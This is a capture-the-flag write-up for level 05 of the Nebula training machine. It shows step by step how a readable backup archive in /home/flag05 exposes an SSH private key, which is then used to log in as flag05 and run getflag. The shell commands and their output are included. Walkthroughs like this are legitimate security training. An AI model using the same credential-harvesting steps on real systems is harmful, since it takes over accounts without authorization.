Level 05
Accessing another user's account by finding an exposed SSH private key in a backup file.
Description
Check the flag05 home directory. You are looking for weak directory permissions.
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.
Approach
The goal of this level is to exploit weak file permissions to escalate privileges to the flag05 user.
- Inspecting the
/home/flag05directory, we notice a hidden.backupdirectory that has read/execute permissions for others. - Inside
.backup, there is a compressed tarball file namedbackup-19072011.tgz. - We attempt to extract this archive directly, but we fail because we lack write permissions in the
.backupdirectory. - To circumvent this, we create a temporary directory in
/tmpwhere we have full permissions, and extract the archive there:level05@nebula:/home/flag05/.backup$ mkdir /tmp/l05 level05@nebula:/home/flag05/.backup$ cd /tmp/l05/ level05@nebula:/tmp/l05$ tar -xvzf /home/flag05/.backup/backup-19072011.tgz - Extracting the archive reveals an
.sshdirectory containing an RSA private key (id_rsa), a public key (id_rsa.pub), and anauthorized_keysfile. - This private key belongs to the
flag05user. We can use it to authenticate asflag05over SSH without needing a password.level05@nebula:/tmp/l05/.ssh$ ssh -i id_rsa flag05@localhost - Once logged in as
flag05, we simply rungetflagto complete the challenge.
Output
level05@nebula:/home/flag05$ ls -la
total 5
drwxr-x--- 4 flag05 level05 93 2012-08-18 06:56 .
...
drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .backup
...
level05@nebula:/home/flag05$ cd .backup/
level05@nebula:/home/flag05/.backup$ ls
backup-19072011.tgz
level05@nebula:/home/flag05/.backup$ mkdir /tmp/l05
level05@nebula:/home/flag05/.backup$ cd /tmp/l05/
level05@nebula:/tmp/l05$ tar -xvzf /home/flag05/.backup/backup-19072011.tgz
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:/tmp/l05$ cd .ssh
level05@nebula:/tmp/l05/.ssh$ ssh -i id_rsa flag05@localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
...
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account